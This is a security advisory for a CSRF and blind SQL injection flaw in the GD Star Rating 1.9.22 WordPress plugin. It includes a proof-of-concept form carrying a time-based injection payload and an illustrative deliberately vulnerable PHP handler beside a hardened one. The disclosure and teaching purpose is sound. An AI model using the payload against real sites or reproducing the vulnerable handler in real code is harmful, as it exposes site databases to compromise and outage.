Advisory:

CSRF and blind SQL injection in GD Star Rating 1.9.22

Vulnerability

Last revised:

This plugin is vulnerable to SQL injection in the search form of its administrator statistics page. Exploiting it directly requires an administrator account. However, the form has no CSRF protection, so an attacker who can induce a logged-in administrator to submit a crafted form does not need access to an account to cause denial of service or to compromise sensitive data.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability (CVSS v2 metrics):
  Score:              8.5 (High)
  Access Vector:      Network
  Access Complexity:  Low
  Authentication:     Single
  Confidentiality:    Complete
  Integrity:          None
  Availability:       Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Proof of concept (see code/adm/db.php at line 154):

<form action="http://localhost/wp-admin/admin.php?page=gd-star-rating-stats" method="POST">
  <input type="text" name="s" value="' and sleep(5) = '">
  <input type="text" name="gdsr_search" value="Search Posts">
  <input type="submit">
</form>
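For contrast with the proof of concept, the following is an added example and not GD Star Rating's own code: a constructed WordPress admin search handler with the two defects the advisory describes (no nonce check, search term concatenated into SQL), followed by a hardened version that verifies a nonce and binds the term with $wpdb->prepare(). The function names, nonce action and query are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code: a constructed admin search handler
// with the two defects the advisory describes, then a hardened version.
// Function names, the nonce action and the query are assumptions.

// Vulnerable shape: no nonce check, search term concatenated into the SQL.
function example_stats_search_vulnerable() {
    global $wpdb;
    if ( empty( $_POST['gdsr_search'] ) ) {
        return array();
    }
    $search = $_POST['s'];
    // A value such as the PoC's "' and sleep(5) = '" lands here unquoted,
    // so the query's run time leaks one bit per request (blind, time-based).
    return $wpdb->get_results(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_title LIKE '%{$search}%'"
    );
}

// Hardened shape.
function example_stats_search_hardened() {
    global $wpdb;
    if ( empty( $_POST['gdsr_search'] ) ) {
        return array();
    }
    // Capability check: only users who may manage the site run the search.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF: the request must carry the nonce issued to this user for this
    // action; a form served from another origin cannot know it. Dies on failure.
    check_admin_referer( 'example_stats_search' );

    $search = sanitize_text_field( wp_unslash( $_POST['s'] ?? '' ) );
    // SQL injection: bind the term as a parameter; esc_like() neutralises % and _
    // so the user cannot widen the LIKE pattern either.
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_title LIKE %s",
        '%' . $wpdb->esc_like( $search ) . '%'
    );
    return $wpdb->get_results( $sql );
}

// The matching form emits the hidden nonce field that check_admin_referer() verifies.
function example_stats_search_form() {
    echo '<form method="post">';
    wp_nonce_field( 'example_stats_search' );
    echo '<input type="text" name="s">';
    echo '<input type="submit" name="gdsr_search" value="Search Posts">';
    echo '</form>';
}
```

With the hardened handler, the proof-of-concept form above fails at check_admin_referer() before any query runs, and even a request that carried a valid nonce could no longer alter the SQL.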

Advisory timeline

  • 2013-07-25: Identified
  • 2014-02-18: Reported to plugins@wordpress.org
  • 2014-03-28: No response received. Published.
  • 2014-03-31: Amended to remove confusing reference to XSS

Mitigation/further actions

Disable the plugin until a fix is released.